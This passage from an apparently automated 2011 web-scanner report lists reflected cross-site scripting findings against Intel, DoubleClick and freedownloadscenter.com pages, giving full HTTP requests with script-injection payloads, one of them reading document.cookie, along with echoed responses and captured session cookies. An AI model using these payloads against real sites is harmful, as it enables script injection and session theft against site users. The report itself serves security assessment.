Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; jive.recentHistory.-1=31342c323031363b; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.3.10.1296947569; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947627821; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:13:33 GMT
Server: Apache
X-JAL: 309
Content-Language: en-US
CacheHit: D=311516 t=1296947613247827
X-JSL: D=311521 t=1296947613247827
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close


<div class="content-large">

<!-- Parameters that have to be defined before including this ftl-->
<!-- tagSets is a collection of TagSet-->
<!-- Specialize ContentFilterHandler if there is a
...[SNIP]...
<div class="jive-widget-filter jive-content-filter widgetclass_7llQwi3c39a"><script>alert(1)</script>af3c9d8300 clearfix">
...[SNIP]...

4.11. http://newsroom.intel.com/render-widget!execute.jspa [idPrefix parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /render-widget!execute.jspa

Issue detail

The value of the idPrefix request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cd3a"%3balert(1)//4691b8f75cd was submitted in the idPrefix parameter. This input was echoed as 4cd3a";alert(1)//4691b8f75cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /render-widget!execute.jspa?container=2016&containerType=14&frameID=15017&idPrefix=7llQwi4cd3a"%3balert(1)//4691b8f75cd&start=0&range=3&numResults=3&tagSet=-1&widgetID=1002&widgetType=3 HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; jive.recentHistory.-1=31342c323031363b; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.3.10.1296947569; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947627821; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:13:52 GMT
Server: Apache
X-JAL: 344
Content-Language: en-US
CacheHit: D=346411 t=1296947632747487
X-JSL: D=346417 t=1296947632747487
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close


<div class="content-large">

<!-- Parameters that have to be defined before including this ftl-->
<!-- tagSets is a collection of TagSet-->
<!-- Specialize ContentFilterHandler if there is a
...[SNIP]...
ontent-content-block-container_7llQwi4cd3a";alert(1)//4691b8f75cd'),
"/render-widget!execute.jspa #jive-recentcontent-content-block-container_7llQwi4cd3a";alert(1)//4691b8f75cd",
{
frameID: parsedFrameID,
widge
...[SNIP]...

4.12. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload 488f2<script>alert(1)</script>c924c785a0a was submitted in the slotname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gampad/ads?correlator=1296956995929&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&a2ids=BOVAw%2C&cids=VxBQkM%2C&pstok=b8HFZCHCK-UKDgoKCIOqThDDhIXiFRAACgA&client=ca-pub-5783553522579509&slotname=Tile2_RightCol488f2<script>alert(1)</script>c924c785a0a&page_slots=CenterCol_Tile1%2CTile1_RightCol%2CTile2_RightCol&cust_params=Site%3DHA&cookie=ID%3D9c79886a0efcbf70%3AT%3D1296942810%3AS%3DALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig&ga_vid=1785005893.1296942825&ga_sid=1296956996&ga_hid=1372920090&ga_fc=true&url=http%3A%2F%2Fhomeappliance.manualsonline.com%2Fex%2Fmfg%2Fheadline%2Fm%2Fariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281%2Fd%2Ftype%2Fproduct_problem&ref=http%3A%2F%2Fburp%2Fshow%2F1&lmt=1296978611&dt=1296957011025&cc=11&biw=969&bih=996&ifi=3&adk=1414079277&u_tz=-360&u_his=1&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.1.103 HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 06 Feb 2011 01:56:13 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 1304

GA_googleSetAdContentsBySlotForSync({"Tile2_RightCol488f2<script>alert(1)</script>c924c785a0a":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#f
...[SNIP]...

4.13. http://www.freedownloadscenter.com/mybeta/Search/newsearch.php3 [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.freedownloadscenter.com
Path:   /mybeta/Search/newsearch.php3

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 2c0d9<script>alert(1)</script>9e325663c1f was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mybeta/Search/newsearch.php3?q=32c0d9<script>alert(1)</script>9e325663c1f&Category=(select HTTP/1.1
Host: www.freedownloadscenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Date: Sat, 05 Feb 2011 23:30:06 GMT
Content-Type: text/html
Connection: close
Keep-Alive: timeout=15, max=500
Content-Length: 25829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>
<head>
<title>Free 32c0d9<script>alert(1)</script>9e325663c1f downloads</title>
...[SNIP]...
<div class="descript">
e.g. 32c0d9<script>alert(1)</script>9e325663c1f</div>
...[SNIP]...

4.14. http://www.freedownloadscenter.com/mybeta/Search/newsearch.php3 [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.freedownloadscenter.com
Path:   /mybeta/Search/newsearch.php3

Issue detail

The value of the q request parameter is copied into the HTML document as text between TITLE tags. The payload c6f32</title><script>alert(1)</script>2663608f414 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mybeta/Search/newsearch.php3?q=3c6f32</title><script>alert(1)</script>2663608f414&Category=(select HTTP/1.1
Host: www.freedownloadscenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Date: Sat, 05 Feb 2011 23:30:08 GMT
Content-Type: text/html
Connection: close
Keep-Alive: timeout=15, max=500
Content-Length: 26021

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>
<head>
<title>Free 3c6f32</title><script>alert(1)</script>2663608f414 downloads</title>
...[SNIP]...

4.15. http://www.freedownloadscenter.com/mybeta/Search/newsearch.php3 [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.freedownloadscenter.com
Path:   /mybeta/Search/newsearch.php3

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4467d"><script>alert(1)</script>8eb7829c8dc was submitted in the q parameter. This input was echoed as 4467d\"><script>alert(1)</script>8eb7829c8dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mybeta/Search/newsearch.php3?q=34467d"><script>alert(1)</script>8eb7829c8dc&Category=(select HTTP/1.1
Host: www.freedownloadscenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Date: Sat, 05 Feb 2011 23:30:05 GMT
Content-Type: text/html
Connection: close
Keep-Alive: timeout=15, max=500
Content-Length: 25901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>
<head>
<title>Free 34467d\"><script>alert(1)</script>8eb7829c8dc downloads</tit
...[SNIP]...
<META name="description" content="Free 34467d\"><script>alert(1)</script>8eb7829c8dc downloads">
...[SNIP]...

4.16. http://appdeveloper.intel.com/en-us/blog/2011/02/04/location-awareness-demo-qt-creator-using-qml [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://appdeveloper.intel.com
Path:   /en-us/blog/2011/02/04/location-awareness-demo-qt-creator-using-qml

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 865a4"-alert(1)-"ce65034e0f1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/blog/2011/02/04/location-awareness-demo-qt-creator-using-qml HTTP/1.1
Host: appdeveloper.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=865a4"-alert(1)-"ce65034e0f1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Feb 2011 23:18:20 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Set-Cookie: SESS5a5e2306769d28180c45e44dbead8572=38574e65cbb57f2b899725d71389c0ab; expires=Tue, 01-Mar-2011 02:51:40 GMT; path=/
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 23:18:20 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: loginpt=0
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en" lang="en" dir="ltr">
...[SNIP]...
ustom24 = "";
                   var wa_eCustom28="http://appdeveloper.intel.com/en-us/blog/2011/02/04/location-awareness-demo-qt-creator-using-qml";
                   
                   var wa_custom11="http://www.google.com/search?hl=en&q=865a4"-alert(1)-"ce65034e0f1";
                   
                   
                                       var wa_urlQueryString="";
                   var wa_reportSuites="intelappdeveloper,intelcorpsw";
                   var wa_trackDFA="n";
                   
               </script>
...[SNIP]...

4.17. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 10]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations

Issue detail

The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edeec"style%3d"x%3aexpression(alert(1))"e9cdcf08be6 was submitted in the REST URL parameter 10. This input was echoed as edeec"style="x:expression(alert(1))"e9cdcf08be6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporationsedeec"style%3d"x%3aexpression(alert(1))"e9cdcf08be6 HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:38 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporationsedeec"style="x:expression(alert(1))"e9cdcf08be6?cid=rss-182178-c1-264110
Content-Length: 236
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporationsedeec"style="x:expression(alert(1))"e9cdcf08be6?cid=rss-182178-c1-264110">
...[SNIP]...

4.18. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 2]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b7ba"style%3d"x%3aexpression(alert(1))"c49e060793 was submitted in the REST URL parameter 2. This input was echoed as 2b7ba"style="x:expression(alert(1))"c49e060793 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-2641102b7ba"style%3d"x%3aexpression(alert(1))"c49e060793/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:02 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-2641102b7ba"style="x:expression(alert(1))"c49e060793
Content-Length: 235
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-2641102b7ba"style="x:expression(alert(1))"c49e060793">
...[SNIP]...

4.19. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 3]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f74ef"style%3d"x%3aexpression(alert(1))"4e7c6c9736f was submitted in the REST URL parameter 3. This input was echoed as f74ef"style="x:expression(alert(1))"4e7c6c9736f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264110/newsroom.intel.comf74ef"style%3d"x%3aexpression(alert(1))"4e7c6c9736f/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:07 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.comf74ef"style="x:expression(alert(1))"4e7c6c9736f/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations
Content-Length: 211
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.comf74ef"style="x:expression(alert(1))"4e7c6c9736f/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations">
...[SNIP]...

4.20. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 4]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3c60"style%3d"x%3aexpression(alert(1))"f7e517be872 was submitted in the REST URL parameter 4. This input was echoed as a3c60"style="x:expression(alert(1))"f7e517be872 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264110/newsroom.intel.com/communitya3c60"style%3d"x%3aexpression(alert(1))"f7e517be872/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:12 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/communitya3c60"style="x:expression(alert(1))"f7e517be872/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110
Content-Length: 236
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/communitya3c60"style="x:expression(alert(1))"f7e517be872/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110">
...[SNIP]...

4.21. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 5]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76889"style%3d"x%3aexpression(alert(1))"10790f520d6 was submitted in the REST URL parameter 5. This input was echoed as 76889"style="x:expression(alert(1))"10790f520d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom76889"style%3d"x%3aexpression(alert(1))"10790f520d6/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:16 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
Location: http://newsroom.intel.com/community/intel_newsroom76889"style="x:expression(alert(1))"10790f520d6/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110
Content-Length: 236
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom76889"style="x:expression(alert(1))"10790f520d6/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110">
...[SNIP]...

4.22. http://rss.intel.com/click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations [REST URL parameter 6]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.intel.com
Path:   /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 836ce"style%3d"x%3aexpression(alert(1))"5c86aca20ef was submitted in the REST URL parameter 6. This input was echoed as 836ce"style="x:expression(alert(1))"5c86aca20ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog836ce"style%3d"x%3aexpression(alert(1))"5c86aca20ef/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 05 Feb 2011 23:22:20 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
